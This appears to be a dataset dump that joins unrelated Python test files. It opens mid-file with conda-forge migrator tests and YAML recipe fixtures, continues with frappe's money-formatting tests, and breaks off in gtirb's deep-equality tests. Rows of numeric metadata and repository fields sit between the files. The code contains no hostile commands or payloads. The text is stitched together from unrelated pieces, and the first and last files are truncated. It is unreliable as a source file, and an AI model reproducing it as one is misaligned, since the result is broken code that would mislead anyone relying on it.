sha256: 5310ea5c8c707f387589bba8934ab9112463a452f828adf2755792d968b9ac7e
build:
number: 0
skip: True # [win]
requirements:
build:
- toolchain3
- perl 5.22.2.1
- expat 2.2.*
run:
- perl 5.22.2.1
- perl-xml-parser
- expat 2.2.*
test:
imports:
- XML::Parser
- XML::Parser::Expat
- XML::Parser::Style::Debug
- XML::Parser::Style::Objects
- XML::Parser::Style::Stream
- XML::Parser::Style::Subs
- XML::Parser::Style::Tree
about:
home: https://metacpan.org/pod/XML::Parser
# According to http://dev.perl.org/licenses/ Perl5 is licensed either under
# GPL v1 or later or the Artistic License
license: GPL-3.0
license_family: GPL
summary: A perl module for parsing XML documents
extra:
recipe-maintainers:
- kynan
"""
updated_perl = """
{# updated_perl #}
{% set version = "2.44_01" %}
package:
name: perl-xml-parser
version: {{ version }}
source:
fn: XML-Parser-{{ version }}.tar.gz
url: https://cpan.metacpan.org/authors/id/T/TO/TODDR/XML-Parser-{{ version }}.tar.gz
sha256: 5310ea5c8c707f387589bba8934ab9112463a452f828adf2755792d968b9ac7e
build:
number: 1
skip: True # [win]
requirements:
build:
- toolchain3
- perl
- expat 2.2.*
run:
- perl
- perl-xml-parser
- expat 2.2.*
test:
imports:
- XML::Parser
- XML::Parser::Expat
- XML::Parser::Style::Debug
- XML::Parser::Style::Objects
- XML::Parser::Style::Stream
- XML::Parser::Style::Subs
- XML::Parser::Style::Tree
about:
home: https://metacpan.org/pod/XML::Parser
# According to http://dev.perl.org/licenses/ Perl5 is licensed either under
# GPL v1 or later or the Artistic License
license: GPL-3.0
license_family: GPL
summary: A perl module for parsing XML documents
extra:
recipe-maintainers:
- kynan
"""
updated_pinning = """
{# updated_pinning #}
{% set version = "2.44_01" %}
package:
name: perl-xml-parser
version: {{ version }}
source:
fn: XML-Parser-{{ version }}.tar.gz
url: https://cpan.metacpan.org/authors/id/T/TO/TODDR/XML-Parser-{{ version }}.tar.gz
sha256: 5310ea5c8c707f387589bba8934ab9112463a452f828adf2755792d968b9ac7e
build:
number: 1
skip: True # [win]
requirements:
build:
- toolchain3
- perl
- expat
run:
- perl
- perl-xml-parser
- expat
test:
imports:
- XML::Parser
- XML::Parser::Expat
- XML::Parser::Style::Debug
- XML::Parser::Style::Objects
- XML::Parser::Style::Stream
- XML::Parser::Style::Subs
- XML::Parser::Style::Tree
about:
home: https://metacpan.org/pod/XML::Parser
# According to http://dev.perl.org/licenses/ Perl5 is licensed either under
# GPL v1 or later or the Artistic License
license: GPL-3.0
license_family: GPL
summary: A perl module for parsing XML documents
extra:
recipe-maintainers:
- kynan
"""
sample_blas = """
{# sample_blas #}
{% set version = "1.2.1" %}
{% set variant = "openblas" %}
package:
name: scipy
version: {{ version }}
source:
url: https://github.com/scipy/scipy/archive/v{{ version }}.tar.gz
sha256: d4b9c1c1dee37ffd1653fd62ea52587212d3b1570c927f16719fd7c4077c0d0a
build:
number: 0
skip: true # [win]
features:
- blas_{{ variant }}
requirements:
build:
- {{ compiler('fortran') }}
- {{ compiler('c') }}
- {{ compiler('cxx') }}
host:
- python
- setuptools
- cython
- blas 1.1 {{ variant }}
- openblas
- numpy
run:
- python
- blas 1.1 {{ variant }}
- openblas
- {{ pin_compatible('numpy') }}
test:
requires:
- pytest
- mpmath
"""
updated_blas = """
{# updated_blas #}
{% set version = "1.2.1" %}
package:
name: scipy
version: {{ version }}
source:
url: https://github.com/scipy/scipy/archive/v{{ version }}.tar.gz
sha256: d4b9c1c1dee37ffd1653fd62ea52587212d3b1570c927f16719fd7c4077c0d0a
build:
number: 1
skip: true # [win]
features:
requirements:
build:
- {{ compiler('fortran') }}
- {{ compiler('c') }}
- {{ compiler('cxx') }}
host:
- libblas
- libcblas
- python
- setuptools
- cython
- numpy
run:
- python
- {{ pin_compatible('numpy') }}
test:
requires:
- pytest
- mpmath
"""
sample_matplotlib = """
{% set version = "0.9" %}
package:
name: viscm
version: {{ version }}
source:
url: https://pypi.io/packages/source/v/viscm/viscm-{{ version }}.tar.gz
sha256: c770e4b76f726e653d2b7c2c73f71941a88de6eb47ccf8fb8e984b55562d05a2
build:
number: 0
noarch: python
script: python -m pip install --no-deps --ignore-installed .
requirements:
host:
- python
- pip
- numpy
run:
- python
- numpy
- matplotlib
- colorspacious
test:
imports:
- viscm
about:
home: https://github.com/bids/viscm
license: MIT
license_file: LICENSE
license_family: MIT
# license_file: '' we need to an issue upstream to get a license in the source dist.
summary: A colormap tool
extra:
recipe-maintainers:
- kthyng
"""
sample_matplotlib_correct = """
{% set version = "0.9" %}
package:
name: viscm
version: {{ version }}
source:
url: https://pypi.io/packages/source/v/viscm/viscm-{{ version }}.tar.gz
sha256: c770e4b76f726e653d2b7c2c73f71941a88de6eb47ccf8fb8e984b55562d05a2
build:
number: 1
noarch: python
script: python -m pip install --no-deps --ignore-installed .
requirements:
host:
- python
- pip
- numpy
run:
- python
- numpy
- matplotlib-base
- colorspacious
test:
imports:
- viscm
about:
home: https://github.com/bids/viscm
license: MIT
license_file: LICENSE
license_family: MIT
# license_file: '' we need to an issue upstream to get a license in the source dist.
summary: A colormap tool
extra:
recipe-maintainers:
- kthyng
"""
# Instantiate one of each legacy migrator exercised by the tests below.
js = JS()
version = Version(set())
# compiler = Compiler()
noarch = Noarch()
noarchr = NoarchR()
perl = Pinning(removals={"perl"})
pinning = Pinning()


class _Rebuild(NoFilter, Rebuild):
    # Rebuild migrator with filtering disabled (see NoFilter).
    pass


rebuild = _Rebuild(name="rebuild", cycles=[])


class _BlasRebuild(NoFilter, BlasRebuild):
    # BlasRebuild migrator with filtering disabled.
    pass


blas_rebuild = _BlasRebuild(cycles=[])

matplotlib = Replacement(
    old_pkg="matplotlib",
    new_pkg="matplotlib-base",
    rationale=(
        "Unless you need `pyqt`, recipes should depend only on " "`matplotlib-base`."
    ),
    pr_limit=5,
)

# Minimal dependency graph and xonsh environment the migrators expect to find.
G = nx.DiGraph()
G.add_node("conda", reqs=["python"])
env = builtins.__xonsh__.env  # type: ignore
env["GRAPH"] = G
env["CIRCLE_BUILD_URL"] = "hi world"
def run_test_migration(
    m,
    inp,
    output,
    kwargs,
    prb,
    mr_out,
    should_filter=False,
    tmpdir=None,
):
    """Drive one migrator end-to-end over a single on-disk recipe.

    Parameters
    ----------
    m : migrator instance under test.
    inp : str -- input ``meta.yaml`` text, written into ``tmpdir``.
    output : str -- expected ``meta.yaml`` text after migration.
    kwargs : dict -- extra attributes merged into the feedstock payload
        before filtering (e.g. ``feedstock_name``, ``req``).
    prb : str -- fragment expected to appear in the migrator's PR body.
    mr_out : dict or falsy -- expected migration result record.
        NOTE(review): when truthy it is mutated in place
        (``bot_rerun=False`` is added) -- callers share that side effect.
    should_filter : bool -- whether ``m.filter`` is expected to skip the node.
    tmpdir : str -- recipe directory; required in practice despite the
        ``None`` default (every caller passes it).

    Returns the populated feedstock-attribute dict for further inspection.
    """
    mm_ctx = MigratorSessionContext(
        graph=G,
        smithy_version="",
        pinning_version="",
        github_username="",
        github_password="",
        circle_build_url=env["CIRCLE_BUILD_URL"],
    )
    m_ctx = MigratorContext(mm_ctx, m)
    m.bind_to_ctx(m_ctx)

    if mr_out:
        mr_out.update(bot_rerun=False)

    with open(os.path.join(tmpdir, "meta.yaml"), "w") as f:
        f.write(inp)

    # read the conda-forge.yml
    if os.path.exists(os.path.join(tmpdir, "..", "conda-forge.yml")):
        with open(os.path.join(tmpdir, "..", "conda-forge.yml")) as fp:
            cf_yml = fp.read()
    else:
        cf_yml = "{}"

    # Load the meta.yaml (this is done in the graph)
    try:
        name = parse_meta_yaml(inp)["package"]["name"]
    except Exception:
        name = "blah"

    pmy = populate_feedstock_attributes(name, {}, inp, cf_yml)

    # these are here for legacy migrators
    pmy["version"] = pmy["meta_yaml"]["package"]["version"]
    pmy["req"] = set()
    for k in ["build", "host", "run"]:
        req = pmy["meta_yaml"].get("requirements", {}) or {}
        _set = req.get(k) or set()
        pmy["req"] |= set(_set)
    pmy["raw_meta_yaml"] = inp
    pmy.update(kwargs)

    assert m.filter(pmy) is should_filter
    if should_filter:
        return pmy

    m.run_pre_piggyback_migrations(
        tmpdir,
        pmy,
        hash_type=pmy.get("hash_type", "sha256"),
    )
    mr = m.migrate(tmpdir, pmy, hash_type=pmy.get("hash_type", "sha256"))
    m.run_post_piggyback_migrations(
        tmpdir,
        pmy,
        hash_type=pmy.get("hash_type", "sha256"),
    )
    assert mr_out == mr
    if not mr:
        return pmy

    pmy.update(PRed=[frozen_to_json_friendly(mr)])
    with open(os.path.join(tmpdir, "meta.yaml")) as f:
        actual_output = f.read()
    # strip jinja comments
    pat = re.compile(r"{#.*#}")
    actual_output = pat.sub("", actual_output)
    output = pat.sub("", output)
    assert actual_output == output

    # NOTE(review): indentation was reconstructed from a whitespace-stripped
    # copy; upstream runs the final filter check for all non-Rebuild
    # migrators -- confirm against the original file.
    if isinstance(m, Compiler):
        assert m.messages in m.pr_body(None)
    # TODO: fix subgraph here (need this to be xsh file)
    elif isinstance(m, Version):
        pass
    elif isinstance(m, Rebuild):
        return pmy
    else:
        assert prb in m.pr_body(None)
    assert m.filter(pmy) is True
    return pmy
@pytest.mark.skip
def test_js_migrator(tmpdir):
    """Run the JS migrator over the basic node sample (currently skipped)."""
    expected_mr = {"migrator_name": "JS", "migrator_version": JS.migrator_version}
    run_test_migration(
        m=js,
        inp=sample_js,
        output=correct_js,
        kwargs={},
        prb="Please merge the PR only after the tests have passed.",
        mr_out=expected_mr,
        tmpdir=tmpdir,
    )
@pytest.mark.skip
def test_js_migrator2(tmpdir):
    """Run the JS migrator over the second node sample (currently skipped)."""
    expected_mr = {"migrator_name": "JS", "migrator_version": JS.migrator_version}
    run_test_migration(
        m=js,
        inp=sample_js2,
        output=correct_js2,  # noqa
        kwargs={},
        prb="Please merge the PR only after the tests have passed.",
        mr_out=expected_mr,
        tmpdir=tmpdir,
    )
@pytest.mark.skip
def test_cb3(tmpdir):
    """Run the compiler (cb3) migrator over the sample recipe.

    Skipped -- note the module-level ``compiler`` instance referenced below
    is commented out above; the NameError only stays latent because the
    body never executes.
    """
    run_test_migration(
        m=compiler,
        inp=sample_cb3,
        output=correct_cb3,
        kwargs={},
        prb="N/A",
        mr_out={
            "migrator_name": "Compiler",
            "migrator_version": Compiler.migrator_version,
        },
        tmpdir=tmpdir,
    )
def test_noarch(tmpdir):
    """Run the Noarch migrator over the xpdan sample recipe."""
    # It seems this injects some bad state somewhere, mostly because it isn't
    # valid yaml
    xpdan_requirements = [
        "python",
        "pip",
        "numpy",
        "scipy",
        "matplotlib",
        "pyyaml",
        "scikit-beam",
        "pyfai",
        "pyxdameraulevenshtein",
        "xray-vision",
        "databroker",
        "bluesky",
        "streamz_ext",
        "xpdsim",
        "shed",
        "xpdview",
        "ophyd",
        "xpdconf",
    ]
    run_test_migration(
        m=noarch,
        inp=sample_noarch,
        output=updated_noarch,
        kwargs={"feedstock_name": "xpdan", "req": xpdan_requirements},
        prb=(
            "I think this feedstock could be built with noarch.\n"
            "This means that the package only needs to be built "
            "once, drastically reducing CI usage.\n"
        ),
        mr_out={
            "migrator_name": "Noarch",
            "migrator_version": Noarch.migrator_version,
        },
        tmpdir=tmpdir,
    )
def test_noarch_space(tmpdir):
    """Run the Noarch migrator over the whitespace-variant xpdan sample."""
    # It seems this injects some bad state somewhere, mostly because it isn't
    # valid yaml
    xpdan_requirements = [
        "python",
        "pip",
        "numpy",
        "scipy",
        "matplotlib",
        "pyyaml",
        "scikit-beam",
        "pyfai",
        "pyxdameraulevenshtein",
        "xray-vision",
        "databroker",
        "bluesky",
        "streamz_ext",
        "xpdsim",
        "shed",
        "xpdview",
        "ophyd",
        "xpdconf",
    ]
    run_test_migration(
        m=noarch,
        inp=sample_noarch_space,
        output=updated_noarch_space,
        kwargs={"feedstock_name": "xpdan", "req": xpdan_requirements},
        prb=(
            "I think this feedstock could be built with noarch.\n"
            "This means that the package only needs to be built "
            "once, drastically reducing CI usage.\n"
        ),
        mr_out={
            "migrator_name": "Noarch",
            "migrator_version": Noarch.migrator_version,
        },
        tmpdir=tmpdir,
    )
def test_noarch_space_python(tmpdir):
    """The Noarch migrator must filter out the ``python`` feedstock itself
    (``should_filter=True``), so no migration output is produced."""
    run_test_migration(
        m=noarch,
        inp=sample_noarch_space,
        output=updated_noarch_space,
        kwargs={"feedstock_name": "python"},
        prb="I think this feedstock could be built with noarch.\n"
        "This means that the package only needs to be built "
        "once, drastically reducing CI usage.\n",
        mr_out={"migrator_name": "Noarch", "migrator_version": Noarch.migrator_version},
        should_filter=True,
        tmpdir=tmpdir,
    )
def test_perl(tmpdir):
    """A Pinning migrator configured with ``removals={"perl"}`` strips the
    perl version pin from the sample recipe."""
    run_test_migration(
        m=perl,
        inp=sample_pinning,
        output=updated_perl,
        kwargs={"req": {"toolchain3", "perl", "expat"}},
        prb="I noticed that this recipe has version pinnings that may not be needed.",
        mr_out={
            "migrator_name": "Pinning",
            "migrator_version": Pinning.migrator_version,
        },
        tmpdir=tmpdir,
    )
def test_perl_pinning(tmpdir):
    """The unconfigured Pinning migrator reports the perl pin in its PR
    body instead of removing it (contrast with test_perl)."""
    run_test_migration(
        m=pinning,
        inp=sample_pinning,
        output=updated_pinning,
        kwargs={"req": {"toolchain3", "perl", "expat"}},
        prb="perl: 5.22.2.1",
        mr_out={
            "migrator_name": "Pinning",
            "migrator_version": Pinning.migrator_version,
        },
        tmpdir=tmpdir,
    )
def test_nnoarch_r(tmpdir):
    """NoarchR migrator converts an R base recipe to noarch.

    NOTE(review): the function name looks like a typo for ``test_noarch_r``;
    renaming would change test discovery, so it is left as-is.
    """
    run_test_migration(
        m=noarchr,
        inp=sample_r_base,
        output=updated_r_base,
        kwargs={"feedstock_name": "r-stabledist"},
        prb="I think this feedstock could be built with noarch",
        mr_out={
            "migrator_name": "NoarchR",
            "migrator_version": noarchr.migrator_version,
        },
        tmpdir=tmpdir,
    )
def test_rebuild_r(tmpdir):
    """The no-filter Rebuild migrator bumps the build of an R recipe; the
    result record carries the migration ``name`` (\"rebuild\")."""
    run_test_migration(
        m=rebuild,
        inp=sample_r_base2,
        output=updated_r_base2,
        kwargs={"feedstock_name": "r-stabledist"},
        prb="It is likely this feedstock needs to be rebuilt.",
        mr_out={
            "migrator_name": "_Rebuild",
            "migrator_version": rebuild.migrator_version,
            "name": "rebuild",
        },
        tmpdir=tmpdir,
    )
def test_nnoarch_r_licenses(tmpdir):
    """NoarchR migration of an R recipe with license-field variants."""
    run_test_migration(
        m=noarchr,
        inp=sample_r_licenses_noarch,
        output=updated_r_licenses_noarch,
        kwargs={"feedstock_name": "r-stabledist"},
        prb="I think this feedstock could be built with noarch",
        mr_out={
            "migrator_name": "NoarchR",
            "migrator_version": noarchr.migrator_version,
        },
        tmpdir=tmpdir,
    )
def test_blas_rebuild(tmpdir):
    """BlasRebuild migrator rewrites the scipy sample for the new BLAS
    scheme; the result record's ``name`` is \"blas2\"."""
    run_test_migration(
        m=blas_rebuild,
        inp=sample_blas,
        output=updated_blas,
        kwargs={"feedstock_name": "scipy"},
        prb="This PR has been triggered in an effort to update for new BLAS scheme.",
        mr_out={
            "migrator_name": "_BlasRebuild",
            "migrator_version": blas_rebuild.migrator_version,
            "name": "blas2",
        },
        tmpdir=tmpdir,
    )
def test_generic_replacement(tmpdir):
    """Replacement migrator swaps ``matplotlib`` for ``matplotlib-base``
    (fixtures: sample_matplotlib / sample_matplotlib_correct)."""
    run_test_migration(
        m=matplotlib,
        inp=sample_matplotlib,
        output=sample_matplotlib_correct,
        kwargs={},
        prb="I noticed that this recipe depends on `matplotlib` instead of ",
        mr_out={
            "migrator_name": "Replacement",
            "migrator_version": matplotlib.migrator_version,
            "name": "matplotlib-to-matplotlib-base",
        },
        tmpdir=tmpdir,
    )
| 22.982759 | 97 | 0.62067 | 5,358 | 45,322 | 5.128779 | 0.095185 | 0.021616 | 0.021834 | 0.033188 | 0.87682 | 0.858297 | 0.843231 | 0.827547 | 0.811208 | 0.799818 | 0 | 0.050289 | 0.232183 | 45,322 | 1,971 | 98 | 22.994419 | 0.739389 | 0.014607 | 0 | 0.835077 | 0 | 0.036923 | 0.750431 | 0.106859 | 0 | 0 | 0 | 0.000507 | 0.006769 | 1 | 0.011077 | false | 0.004308 | 0.014154 | 0.000615 | 0.031385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
160ea33378421471ae231d57bab755872108e9ea | 4,334 | py | Python | frappe/tests/test_fmt_money.py | ssuda777/frappe | d3f3df2ce15154aecc1d9d6d07d947e72c2e8c6e | [
"MIT"
] | 1 | 2021-12-18T18:37:29.000Z | 2021-12-18T18:37:29.000Z | frappe/tests/test_fmt_money.py | JMBodz/frappe | eb218a06d1cbfc3a8f1cc00ba8dac2c927d2f71d | [
"MIT"
] | 3 | 2021-02-27T11:50:14.000Z | 2021-05-03T06:48:49.000Z | frappe/tests/test_fmt_money.py | JMBodz/frappe | eb218a06d1cbfc3a8f1cc00ba8dac2c927d2f71d | [
"MIT"
] | 2 | 2021-09-02T09:51:55.000Z | 2021-09-07T04:55:42.000Z | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
import frappe
from frappe.utils import fmt_money
import unittest
class TestFmtMoney(unittest.TestCase):
    """Tests for ``frappe.utils.fmt_money`` across number formats.

    Each test sets the session default ``number_format`` (and some set
    ``currency_precision``).  The precision tests register ``addCleanup``
    so the default is restored even when an assertion fails mid-test --
    the original trailing reset was skipped on failure, leaking state
    into subsequent tests.
    """

    def test_standard(self):
        # "#,###.##": comma thousands separator, dot decimal, two digits.
        frappe.db.set_default("number_format", "#,###.##")
        self.assertEqual(fmt_money(100), "100.00")
        self.assertEqual(fmt_money(1000), "1,000.00")
        self.assertEqual(fmt_money(10000), "10,000.00")
        self.assertEqual(fmt_money(100000), "100,000.00")
        self.assertEqual(fmt_money(1000000), "1,000,000.00")
        self.assertEqual(fmt_money(10000000), "10,000,000.00")
        self.assertEqual(fmt_money(100000000), "100,000,000.00")
        self.assertEqual(fmt_money(1000000000), "1,000,000,000.00")

    def test_negative(self):
        frappe.db.set_default("number_format", "#,###.##")
        self.assertEqual(fmt_money(-100), "-100.00")
        self.assertEqual(fmt_money(-1000), "-1,000.00")
        self.assertEqual(fmt_money(-10000), "-10,000.00")
        self.assertEqual(fmt_money(-100000), "-100,000.00")
        self.assertEqual(fmt_money(-1000000), "-1,000,000.00")
        self.assertEqual(fmt_money(-10000000), "-10,000,000.00")
        self.assertEqual(fmt_money(-100000000), "-100,000,000.00")
        self.assertEqual(fmt_money(-1000000000), "-1,000,000,000.00")

    def test_decimal(self):
        # "#.###,##": European style -- dot thousands, comma decimal.
        frappe.db.set_default("number_format", "#.###,##")
        self.assertEqual(fmt_money(-100), "-100,00")
        self.assertEqual(fmt_money(-1000), "-1.000,00")
        self.assertEqual(fmt_money(-10000), "-10.000,00")
        self.assertEqual(fmt_money(-100000), "-100.000,00")
        self.assertEqual(fmt_money(-1000000), "-1.000.000,00")
        self.assertEqual(fmt_money(-10000000), "-10.000.000,00")
        self.assertEqual(fmt_money(-100000000), "-100.000.000,00")
        self.assertEqual(fmt_money(-1000000000), "-1.000.000.000,00")

    def test_lacs(self):
        # "#,##,###.##": Indian lakh/crore grouping.
        frappe.db.set_default("number_format", "#,##,###.##")
        self.assertEqual(fmt_money(100), "100.00")
        self.assertEqual(fmt_money(1000), "1,000.00")
        self.assertEqual(fmt_money(10000), "10,000.00")
        self.assertEqual(fmt_money(100000), "1,00,000.00")
        self.assertEqual(fmt_money(1000000), "10,00,000.00")
        self.assertEqual(fmt_money(10000000), "1,00,00,000.00")
        self.assertEqual(fmt_money(100000000), "10,00,00,000.00")
        self.assertEqual(fmt_money(1000000000), "1,00,00,00,000.00")

    def test_no_precision(self):
        # "#,###": fractional part is truncated entirely.
        frappe.db.set_default("number_format", "#,###")
        self.assertEqual(fmt_money(0.3), "0")
        self.assertEqual(fmt_money(100.3), "100")
        self.assertEqual(fmt_money(1000.3), "1,000")
        self.assertEqual(fmt_money(10000.3), "10,000")
        self.assertEqual(fmt_money(-0.3), "0")
        self.assertEqual(fmt_money(-100.3), "-100")
        self.assertEqual(fmt_money(-1000.3), "-1,000")

    def test_currency_precision(self):
        frappe.db.set_default("currency_precision", "4")
        # Restore the default even if an assertion below fails.
        self.addCleanup(frappe.db.set_default, "currency_precision", "")
        frappe.db.set_default("number_format", "#,###.##")

        # Whole numbers still render with the format's two decimals...
        self.assertEqual(fmt_money(100), "100.00")
        self.assertEqual(fmt_money(1000), "1,000.00")
        self.assertEqual(fmt_money(10000), "10,000.00")
        self.assertEqual(fmt_money(100000), "100,000.00")
        self.assertEqual(fmt_money(1000000), "1,000,000.00")
        self.assertEqual(fmt_money(10000000), "10,000,000.00")
        self.assertEqual(fmt_money(100000000), "100,000,000.00")
        self.assertEqual(fmt_money(1000000000), "1,000,000,000.00")

        # ...while fractional values keep up to four significant decimals.
        self.assertEqual(fmt_money(100.23), "100.23")
        self.assertEqual(fmt_money(1000.456), "1,000.456")
        self.assertEqual(fmt_money(10000.7890), "10,000.789")
        self.assertEqual(fmt_money(100000.1234), "100,000.1234")
        self.assertEqual(fmt_money(1000000.3456), "1,000,000.3456")
        self.assertEqual(fmt_money(10000000.3344567), "10,000,000.3345")
        self.assertEqual(fmt_money(100000000.37827268), "100,000,000.3783")
        self.assertEqual(fmt_money(1000000000.2718272637), "1,000,000,000.2718")

    def test_currency_precision_de_format(self):
        frappe.db.set_default("currency_precision", "4")
        # Restore the default even if an assertion below fails.
        self.addCleanup(frappe.db.set_default, "currency_precision", "")
        frappe.db.set_default("number_format", "#.###,##")

        self.assertEqual(fmt_money(100), "100,00")
        self.assertEqual(fmt_money(1000), "1.000,00")
        self.assertEqual(fmt_money(10000), "10.000,00")
        self.assertEqual(fmt_money(100000), "100.000,00")

        self.assertEqual(fmt_money(100.23), "100,23")
        self.assertEqual(fmt_money(1000.456), "1.000,456")
if __name__=="__main__":
frappe.connect()
unittest.main() | 44.680412 | 74 | 0.716659 | 656 | 4,334 | 4.57622 | 0.106707 | 0.165223 | 0.365756 | 0.467355 | 0.862092 | 0.790806 | 0.761492 | 0.733511 | 0.708528 | 0.708528 | 0 | 0.225038 | 0.080295 | 4,334 | 97 | 75 | 44.680412 | 0.528098 | 0.02192 | 0 | 0.325581 | 0 | 0 | 0.203682 | 0 | 0 | 0 | 0 | 0 | 0.709302 | 1 | 0.081395 | false | 0 | 0.034884 | 0 | 0.127907 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
1638d05840f0ecce26ed7ab6dcf4162144176902 | 41,433 | py | Python | python/tests/test_deep_eq.py | clayne/gtirb | df9bf69537c36136d40fbff98588df37b8c5875f | [
"MIT"
] | 230 | 2018-10-14T11:07:14.000Z | 2022-03-31T21:25:43.000Z | python/tests/test_deep_eq.py | clayne/gtirb | df9bf69537c36136d40fbff98588df37b8c5875f | [
"MIT"
] | 33 | 2018-10-25T15:48:48.000Z | 2022-03-25T03:10:13.000Z | python/tests/test_deep_eq.py | clayne/gtirb | df9bf69537c36136d40fbff98588df37b8c5875f | [
"MIT"
] | 33 | 2018-10-14T11:07:17.000Z | 2022-03-31T16:12:00.000Z | import unittest
import uuid
import gtirb
class DeepEqTest(unittest.TestCase):
def test_code_block(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
b1 = gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id1)
b2 = gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id1)
self.assertTrue(b1.deep_eq(b2))
b2 = gtirb.CodeBlock(size=5, decode_mode=2, offset=3, uuid=id1)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.CodeBlock(size=1, decode_mode=5, offset=3, uuid=id1)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.CodeBlock(size=1, decode_mode=2, offset=5, uuid=id1)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id2)
self.assertFalse(b1.deep_eq(b2))
def test_data_block(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
b1 = gtirb.DataBlock(size=1, offset=3, uuid=id1)
b2 = gtirb.DataBlock(size=1, offset=3, uuid=id1)
self.assertTrue(b1.deep_eq(b2))
b2 = gtirb.DataBlock(size=5, offset=3, uuid=id1)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.DataBlock(size=1, offset=5, uuid=id1)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.DataBlock(size=1, offset=3, uuid=id2)
self.assertFalse(b1.deep_eq(b2))
def test_proxy_blocks(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
b1 = gtirb.ProxyBlock(uuid=id1)
b2 = gtirb.ProxyBlock(uuid=id1)
self.assertTrue(b1.deep_eq(b2))
b2 = gtirb.ProxyBlock(uuid=id2)
self.assertFalse(b1.deep_eq(b2))
def test_symbol(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
s1 = gtirb.Symbol(name="name", payload=None, uuid=id1)
s2 = gtirb.Symbol(name="name", payload=None, uuid=id1)
self.assertTrue(s1.deep_eq(s2))
s1 = gtirb.Symbol(name="name", payload=5, uuid=id1)
s2 = gtirb.Symbol(name="name", payload=5, uuid=id1)
self.assertTrue(s1.deep_eq(s2))
s1 = gtirb.Symbol(
name="name",
payload=gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id1),
uuid=id1,
)
s2 = gtirb.Symbol(
name="name",
payload=gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id1),
uuid=id1,
)
self.assertTrue(s1.deep_eq(s2))
s1 = gtirb.Symbol(name="name1", payload=None, uuid=id1)
s2 = gtirb.Symbol(name="name2", payload=None, uuid=id1)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.Symbol(name="name", payload=None, uuid=id1)
s2 = gtirb.Symbol(name="name", payload=5, uuid=id1)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.Symbol(
name="name",
payload=gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id1),
uuid=id1,
)
s2 = gtirb.Symbol(
name="name",
payload=gtirb.CodeBlock(size=2, decode_mode=2, offset=3, uuid=id1),
uuid=id1,
)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.Symbol(name="name", payload=None, uuid=id1)
s2 = gtirb.Symbol(name="name", payload=None, uuid=id2)
self.assertFalse(s1.deep_eq(s2))
def test_sym_exprs(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
# SymAddrConst
s1 = gtirb.SymAddrConst(
offset=1,
symbol=gtirb.Symbol(name="name", payload=None, uuid=id1),
attributes={gtirb.SymbolicExpression.Attribute.Part1},
)
s2 = gtirb.SymAddrConst(
offset=1,
symbol=gtirb.Symbol(name="name", payload=None, uuid=id1),
attributes={gtirb.SymbolicExpression.Attribute.Part1},
)
self.assertTrue(s1.deep_eq(s2))
s1 = gtirb.SymAddrConst(
offset=1, symbol=gtirb.Symbol(name="name", payload=None, uuid=id1)
)
s2 = gtirb.SymAddrConst(
offset=2, symbol=gtirb.Symbol(name="name", payload=None, uuid=id1)
)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.SymAddrConst(
offset=1, symbol=gtirb.Symbol(name="name1", payload=None, uuid=id1)
)
s2 = gtirb.SymAddrConst(
offset=1, symbol=gtirb.Symbol(name="name2", payload=None, uuid=id1)
)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.SymAddrConst(
offset=1,
symbol=gtirb.Symbol(name="name", payload=None, uuid=id1),
attributes={gtirb.SymbolicExpression.Attribute.Part1},
)
s2 = gtirb.SymAddrConst(
offset=1, symbol=gtirb.Symbol(name="name", payload=None, uuid=id1),
)
self.assertFalse(s1.deep_eq(s2))
# SymAddrAddr
s1 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
attributes={gtirb.SymbolicExpression.Attribute.Part1},
)
s2 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
attributes={gtirb.SymbolicExpression.Attribute.Part1},
)
self.assertTrue(s1.deep_eq(s2))
s1 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
s2 = gtirb.SymAddrAddr(
offset=2,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
s2 = gtirb.SymAddrAddr(
offset=1,
scale=4,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
